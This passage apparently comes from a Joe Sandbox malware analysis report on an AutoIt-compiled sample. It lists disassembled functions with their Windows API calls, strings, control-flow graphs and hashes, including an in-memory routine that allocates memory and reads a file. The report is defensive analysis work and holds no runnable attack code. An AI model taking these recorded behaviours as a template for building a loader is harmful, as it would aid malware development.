                    • _wcscat.LIBCMT ref: 006E94E4
                    • __wsplitpath.LIBCMT ref: 006E9509
                    • _wcscat.LIBCMT ref: 006E951F
                    • _wcscat.LIBCMT ref: 006E9532
                      • Part of subcall function 006E922F: _memmove.LIBCMT ref: 006E9268
                      • Part of subcall function 006E922F: _memmove.LIBCMT ref: 006E9277
                    • _wcscmp.LIBCMT ref: 006E9479
                      • Part of subcall function 006E99BE: _wcscmp.LIBCMT ref: 006E9AAE
                      • Part of subcall function 006E99BE: _wcscmp.LIBCMT ref: 006E9AC1
                    • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 006E96DC
                    • _wcsncpy.LIBCMT ref: 006E974F
                    • DeleteFileW.KERNEL32(?,?), ref: 006E9785
                    • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 006E979B
                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 006E97AC
                    • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 006E97BE
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                    • String ID:
                    • API String ID: 1500180987-0
                    • Opcode ID: 2a44bd4c420f2e3c1a76ea6bdea8891e91ab136e683468ee62966adf9d87678f
                    • Instruction ID: 7ae5032c4642ab7bbd9e5a23aabca3bdaefed97792396446cba061ca67178581
                    • Opcode Fuzzy Hash: 2a44bd4c420f2e3c1a76ea6bdea8891e91ab136e683468ee62966adf9d87678f
                    • Instruction Fuzzy Hash: 5AC140B1D01219AEDF61EF95CC85ADEB7BEEF45300F0040AAF609E7241DB709A848F65
                    Function 00683015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 74windowregistryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    • GetSysColorBrush.USER32(0000000F), ref: 00683074
                    • RegisterClassExW.USER32(00000030), ref: 0068309E
                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 006830AF
                    • InitCommonControlsEx.COMCTL32(?), ref: 006830CC
                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 006830DC
                    • LoadIconW.USER32(000000A9), ref: 006830F2
                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00683101
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                    • API String ID: 2914291525-1005189915
                    • Opcode ID: 02adac3f9d8be60af2ce636fd7b53ef2e14b25ee8eca5f63b17da3ca67ca53ab
                    • Instruction ID: 2bfff9b40f13b25a5102804c6d079f36280f74d074cb8568871acc472e284396
                    • Opcode Fuzzy Hash: 02adac3f9d8be60af2ce636fd7b53ef2e14b25ee8eca5f63b17da3ca67ca53ab
                    • Instruction Fuzzy Hash: 88315EB5800309EFDB50CFA4DC85AD9BFF4FB0A310F14826AE540EA2A1D7B94541CF55
                    Function 00683041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54windowregistryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    • GetSysColorBrush.USER32(0000000F), ref: 00683074
                    • RegisterClassExW.USER32(00000030), ref: 0068309E
                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 006830AF
                    • InitCommonControlsEx.COMCTL32(?), ref: 006830CC
                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 006830DC
                    • LoadIconW.USER32(000000A9), ref: 006830F2
                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00683101
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                    • API String ID: 2914291525-1005189915
                    • Opcode ID: 2cfa6f77a157d1bbced0b5b685ddc632a0c0a4a3c269477f458651f1172995d6
                    • Instruction ID: 02693d02158e94d184a26cee0a1376ed6414c8a80f10886dc87e2c6abadfaf21
                    • Opcode Fuzzy Hash: 2cfa6f77a157d1bbced0b5b685ddc632a0c0a4a3c269477f458651f1172995d6
                    • Instruction Fuzzy Hash: CD21C9B5951318EFDB10DF94EC49B9DBBF8FB0A700F00822AF510A62A0D7B945448F9A
                    Function 006871EB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                      • Part of subcall function 00684864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,007462F8,?,006837C0,?), ref: 00684882
                      • Part of subcall function 006A074F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,006872C5), ref: 006A0771
                    • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00687308
                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 006BECF1
                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 006BED32
                    • RegCloseKey.ADVAPI32(?), ref: 006BED70
                    • _wcscat.LIBCMT ref: 006BEDC9
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                    • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                    • API String ID: 2673923337-2727554177
                    • Opcode ID: 445d22e1475fd79896cf1583b6052f9b2646e7e49e969ba738a230baabc151a6
                    • Instruction ID: d9bd4b8eae50e3bc6bc7cf6e0130d9ceea625996010fcb866968d36c8d8ca63e
                    • Opcode Fuzzy Hash: 445d22e1475fd79896cf1583b6052f9b2646e7e49e969ba738a230baabc151a6
                    • Instruction Fuzzy Hash: 5171A3B55083019EC318EF25EC8189BB7F9FF56740F408A2EF445832A1DBB4D989CB99
                    Function 00683633 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151windowtimeregistryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 760 683633-683681 762 6836e1-6836e3 760->762 763 683683-683686 760->763 762->763 766 6836e5 762->766 764 683688-68368f 763->764 765 6836e7 763->765 767 68375d-683765 PostQuitMessage 764->767 768 683695-68369a 764->768 770 6836ed-6836f0 765->770 771 6bd31c-6bd34a call 6911d0 call 6911f3 765->771 769 6836ca-6836d2 DefWindowProcW 766->769 776 683711-683713 767->776 772 6bd38f-6bd3a3 call 6e2a16 768->772 773 6836a0-6836a2 768->773 775 6836d8-6836de 769->775 777 6836f2-6836f3 770->777 778 683715-68373c SetTimer RegisterWindowMessageW 770->778 807 6bd34f-6bd356 771->807 772->776 800 6bd3a9 772->800 781 6836a8-6836ad 773->781 782 683767-683771 call 684531 773->782 776->775 779 6836f9-68370c KillTimer call 6844cb call 683114 777->779 780 6bd2bf-6bd2c2 777->780 778->776 783 68373e-683749 CreatePopupMenu 778->783 779->776 792 6bd2f8-6bd317 MoveWindow 780->792 793 6bd2c4-6bd2c6 780->793 787 6836b3-6836b8 781->787 788 6bd374-6bd37b 781->788 802 683776 782->802 783->776 798 68374b-68375b call 6845df 787->798 799 6836be-6836c4 787->799 788->769 797 6bd381-6bd38a call 6d817e 788->797 792->776 794 6bd2c8-6bd2cb 793->794 795 6bd2e7-6bd2f3 SetFocus 793->795 794->799 803 6bd2d1-6bd2e2 call 6911d0 794->803 795->776 797->769 798->776 799->769 799->807 800->769 802->776 803->776 807->769 811 6bd35c-6bd36f call 6844cb call 6843db 807->811 811->769
                    APIs
                    • DefWindowProcW.USER32(?,?,?,?), ref: 006836D2
                    • KillTimer.USER32(?,00000001), ref: 006836FC
                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0068371F
                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0068372A
                    • CreatePopupMenu.USER32 ref: 0068373E
                    • PostQuitMessage.USER32(00000000), ref: 0068375F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                    • String ID: TaskbarCreated$%q
                    • API String ID: 129472671-1866366108
                    • Opcode ID: 1a9dd3bd220fc2c6acb58d5191cf661bb570aabe1f69f1692c734eb406150724
                    • Instruction ID: b37315feaab32e759e6e60494f626799c727de595cb6198a0a1a995108b9ad52
                    • Opcode Fuzzy Hash: 1a9dd3bd220fc2c6acb58d5191cf661bb570aabe1f69f1692c734eb406150724
                    • Instruction Fuzzy Hash: F941C5B1200155BBDF247B28DC49BBD375BE702B00F144729F502863A1EBA9EA85976B
                    Function 00683A58 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    • GetSysColorBrush.USER32(0000000F), ref: 00683A62
                    • LoadCursorW.USER32(00000000,00007F00), ref: 00683A71
                    • LoadIconW.USER32(00000063), ref: 00683A88
                    • LoadIconW.USER32(000000A4), ref: 00683A9A
                    • LoadIconW.USER32(000000A2), ref: 00683AAC
                    • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00683AD2
                    • RegisterClassExW.USER32(?), ref: 00683B28
                      • Part of subcall function 00683041: GetSysColorBrush.USER32(0000000F), ref: 00683074
                      • Part of subcall function 00683041: RegisterClassExW.USER32(00000030), ref: 0068309E
                      • Part of subcall function 00683041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 006830AF
                      • Part of subcall function 00683041: InitCommonControlsEx.COMCTL32(?), ref: 006830CC
                      • Part of subcall function 00683041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 006830DC
                      • Part of subcall function 00683041: LoadIconW.USER32(000000A9), ref: 006830F2
                      • Part of subcall function 00683041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00683101
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                    • String ID: #$0$AutoIt v3
                    • API String ID: 423443420-4155596026
                    • Opcode ID: a80eeb475bdd63469ba473e43e1b30c1aa9966b0878de17b43b85e87ef6b3d95
                    • Instruction ID: bb8829104ce4c1d49ee7b071b467b395e083df0bd0673623accbf038abd8bba7
                    • Opcode Fuzzy Hash: a80eeb475bdd63469ba473e43e1b30c1aa9966b0878de17b43b85e87ef6b3d95
                    • Instruction Fuzzy Hash: 7E212B75900304FFEB109FA4EC09B9D7BB5FB0A711F00822AE504A62A0D7FE56548F9A
                    Function 00683778 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 267COMMON
                    Download Yara Rule

                    Control-flow Graph

                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                    • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$bt
                    • API String ID: 1825951767-502447194
                    • Opcode ID: 038572abe49584797b93592b014b1b1ccafdd5fd8c05366fb91bf3cbe8cf0462
                    • Instruction ID: 3123b860f8259a3061ec5e249c399bdd11e3eb0d58ef6289c3e80167d11952e0
                    • Opcode Fuzzy Hash: 038572abe49584797b93592b014b1b1ccafdd5fd8c05366fb91bf3cbe8cf0462
                    • Instruction Fuzzy Hash: 5FA18575910229AACF54FF90CC959EEB7BABF15700F04062EF412B7291EF749A05CB64
                    Function 0068F8CF Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 168comCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                      • Part of subcall function 006A03A2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 006A03D3
                      • Part of subcall function 006A03A2: MapVirtualKeyW.USER32(00000010,00000000), ref: 006A03DB
                      • Part of subcall function 006A03A2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 006A03E6
                      • Part of subcall function 006A03A2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 006A03F1
                      • Part of subcall function 006A03A2: MapVirtualKeyW.USER32(00000011,00000000), ref: 006A03F9
                      • Part of subcall function 006A03A2: MapVirtualKeyW.USER32(00000012,00000000), ref: 006A0401
                      • Part of subcall function 00696259: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0068FA90), ref: 006962B4
                    • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0068FB2D
                    • OleInitialize.OLE32(00000000), ref: 0068FBAA
                    • CloseHandle.KERNEL32(00000000), ref: 006C49F2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                    • String ID: <gt$X<$\dt$%q$ct
                    • API String ID: 1986988660-2227744020
                    • Opcode ID: 2a52b9531e82b0b3e43fd1ac8db76ca93ac4f2b7100b741726ae898a0c7001cf
                    • Instruction ID: 6c864f4570d29d7a12fee57b62faaec166cf0fbb211a811465de1a75cfbdcfca
                    • Opcode Fuzzy Hash: 2a52b9531e82b0b3e43fd1ac8db76ca93ac4f2b7100b741726ae898a0c7001cf
                    • Instruction Fuzzy Hash: 128199B89013908ECB84EF6DE9446557AE5EB8B718310C23FD119C7262EB3D8645CF1A
                    Function 006F9E38 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 983 6f9e38-6f9e72 984 6fa1d9-6fa1dd 983->984 985 6f9e78-6f9e7d 983->985 986 6fa1e2-6fa1e3 984->986 985->984 987 6f9e83-6f9e8c call 6d6543 985->987 988 6fa1e4 call 6f96db 986->988 992 6f9e9f-6f9ea5 987->992 993 6f9e8e-6f9e96 987->993 994 6fa1e9-6fa1ef 988->994 996 6f9eab 992->996 997 6f9ea7-6f9ea9 992->997 995 6f9e98-6f9e9a 993->995 995->988 998 6f9ead-6f9eb5 996->998 997->998 999 6f9eb7-6f9ec1 998->999 1000 6f9ec3-6f9edc call 6d7a1e 998->1000 999->995 1003 6f9ede-6f9ee3 1000->1003 1004 6f9ee8-6f9eef 1000->1004 1003->986 1005 6f9f3e-6f9f6c call 6a0fa5 1004->1005 1006 6f9ef1-6f9efd 1004->1006 1012 6f9f6e-6f9f7c 1005->1012 1013 6f9f95-6f9f97 1005->1013 1006->1005 1008 6f9eff-6f9f0c call 6d76c5 1006->1008 1011 6f9f11-6f9f16 1008->1011 1011->1005 1015 6f9f18-6f9f1f 1011->1015 1014 6f9f9a-6f9fa1 1012->1014 1016 6f9f7e 1012->1016 1013->1014 1017 6f9fa3-6f9fad 1014->1017 1018 6f9fd2-6f9fd9 1014->1018 1019 6f9f2e-6f9f35 1015->1019 1020 6f9f21-6f9f28 1015->1020 1021 6f9f80-6f9f8b call 6d7096 1016->1021 1022 6f9faf-6f9fc5 call 6d70dc 1017->1022 1025 6f9fdb-6f9fe2 1018->1025 1026 6fa058-6fa065 1018->1026 1019->1005 1024 6f9f37 1019->1024 1020->1019 1023 6f9f2a 1020->1023 1036 6f9f8d-6f9f93 1021->1036 1038 6f9fc7-6f9fcf 1022->1038 1023->1019 1024->1005 1025->1026 1031 6f9fe4-6f9ff4 1025->1031 1028 6fa067-6fa071 1026->1028 1029 6fa074-6fa0a3 VariantInit call 6a3020 1026->1029 1028->1029 1041 6fa0a8-6fa0ab 1029->1041 1042 6fa0a5-6fa0a6 1029->1042 1035 6f9ff5-6f9ffd 1031->1035 1039 6f9fff-6fa01c VariantClear 1035->1039 1040 6fa04a-6fa053 1035->1040 1036->1014 1038->1018 1043 6fa01e-6fa032 SysAllocString 1039->1043 1044 6fa035-6fa045 1039->1044 1040->1035 1045 6fa055 1040->1045 1046 6fa0ac-6fa0bd call 6ddcec 1041->1046 1042->1046 1043->1044 1044->1040 1047 6fa047 1044->1047 1045->1026 1048 6fa0c0-6fa0c5 1046->1048 1047->1040 1049 6fa0c7-6fa0cb 1048->1049 1050 6fa103-6fa105 1048->1050 1051 6fa0cd-6fa100 1049->1051 1052 6fa11a-6fa11e 1049->1052 1053 6fa12d-6fa150 call 6d6aa3 call 6e7804 1050->1053 1054 6fa107-6fa10e 1050->1054 1051->1050 1056 6fa11f-6fa128 call 6f96db 1052->1056 1063 6fa1bc-6fa1cb VariantClear 1053->1063 1067 6fa152-6fa15b 1053->1067 1054->1052 1055 6fa110-6fa118 1054->1055 1055->1056 1056->1063 1065 6fa1cd-6fa1d0 call 6ddf93 1063->1065 1066 6fa1d5-6fa1d7 1063->1066 1065->1066 1066->994 1069 6fa15d-6fa16a 1067->1069 1070 6fa16c-6fa173 1069->1070 1071 6fa1b3-6fa1ba 1069->1071 1072 6fa175-6fa185 1070->1072 1073 6fa1a1-6fa1a5 1070->1073 1071->1063 1071->1069 1072->1071 1076 6fa187-6fa18f 1072->1076 1074 6fa1ab 1073->1074 1075 6fa1a7-6fa1a9 1073->1075 1077 6fa1ad-6fa1ae call 6e7804 1074->1077 1075->1077 1076->1073 1078 6fa191-6fa197 1076->1078 1077->1071 1078->1073 1079 6fa199-6fa19f 1078->1079 1079->1071 1079->1073
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID:
                    • String ID: NULL Pointer assignment$Not an Object type
                    • API String ID: 0-572801152
                    • Opcode ID: 673908bc227372228f3d3d83964d1406c263db4277f261489385041ed23a4b77
                    • Instruction ID: 4cc966d9367429fcc63d6f5a985b4cb14c3d892072500723df0094446bbd494c
                    • Opcode Fuzzy Hash: 673908bc227372228f3d3d83964d1406c263db4277f261489385041ed23a4b77
                    • Instruction Fuzzy Hash: 40C170B1A0020D9FDF10CFA8D885BFEB7B6AF48314F158569EA09A7381E7709D45CB61
                    Function 036825F0 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1092 36825f0-368269e call 3680000 1095 36826a5-36826cb call 3683500 CreateFileW 1092->1095 1098 36826cd 1095->1098 1099 36826d2-36826e2 1095->1099 1100 368281d-3682821 1098->1100 1104 36826e9-3682703 VirtualAlloc 1099->1104 1105 36826e4 1099->1105 1102 3682863-3682866 1100->1102 1103 3682823-3682827 1100->1103 1106 3682869-3682870 1102->1106 1107 3682829-368282c 1103->1107 1108 3682833-3682837 1103->1108 1111 368270a-3682721 ReadFile 1104->1111 1112 3682705 1104->1112 1105->1100 1113 3682872-368287d 1106->1113 1114 36828c5-36828da 1106->1114 1107->1108 1109 3682839-3682843 1108->1109 1110 3682847-368284b 1108->1110 1109->1110 1117 368285b 1110->1117 1118 368284d-3682857 1110->1118 1119 3682728-3682768 VirtualAlloc 1111->1119 1120 3682723 1111->1120 1112->1100 1121 368287f 1113->1121 1122 3682881-368288d 1113->1122 1115 36828ea-36828f2 1114->1115 1116 36828dc-36828e7 VirtualFree 1114->1116 1116->1115 1117->1102 1118->1117 1123 368276a 1119->1123 1124 368276f-368278a call 3683750 1119->1124 1120->1100 1121->1114 1125 368288f-368289f 1122->1125 1126 36828a1-36828ad 1122->1126 1123->1100 1132 3682795-368279f 1124->1132 1130 36828c3 1125->1130 1127 36828ba-36828c0 1126->1127 1128 36828af-36828b8 1126->1128 1127->1130 1128->1130 1130->1106 1133 36827a1-36827d0 call 3683750 1132->1133 1134 36827d2-36827e6 call 3683560 1132->1134 1133->1132 1140 36827e8 1134->1140 1141 36827ea-36827ee 1134->1141 1140->1100 1142 36827fa-36827fe 1141->1142 1143 36827f0-36827f4 FindCloseChangeNotification 1141->1143 1144 368280e-3682817 1142->1144 1145 3682800-368280b VirtualFree 1142->1145 1143->1142 1144->1095 1144->1100 1145->1144
                    APIs
                    • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 036826C1
                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 036828E7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1674262971.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: CreateFileFreeVirtual
                    • String ID:
                    • API String ID: 204039940-0
                    • Opcode ID: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                    • Instruction ID: 9d2cf5483f68f2eea1fd9052dd9731ac5f624aeade3bfe065b027ed00ee0548e
                    • Opcode Fuzzy Hash: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                    • Instruction Fuzzy Hash: 1FA12874E00208EBDF14DFA4C9A8BEEB7B5BF48704F208A59E511BB280D7759A85CF54
                    Function 006839E7 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1243 6839e7-683a57 CreateWindowExW * 2 ShowWindow * 2
                    APIs
                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00683A15
                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00683A36
                    • ShowWindow.USER32(00000000,?,?), ref: 00683A4A
                    • ShowWindow.USER32(00000000,?,?), ref: 00683A53
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Window$CreateShow
                    • String ID: AutoIt v3$edit
                    • API String ID: 1584632944-3779509399
                    • Opcode ID: 205c6c4733b78ec7903ab83eba81fc9bd63e652eadcd25be8535b68d9072b240
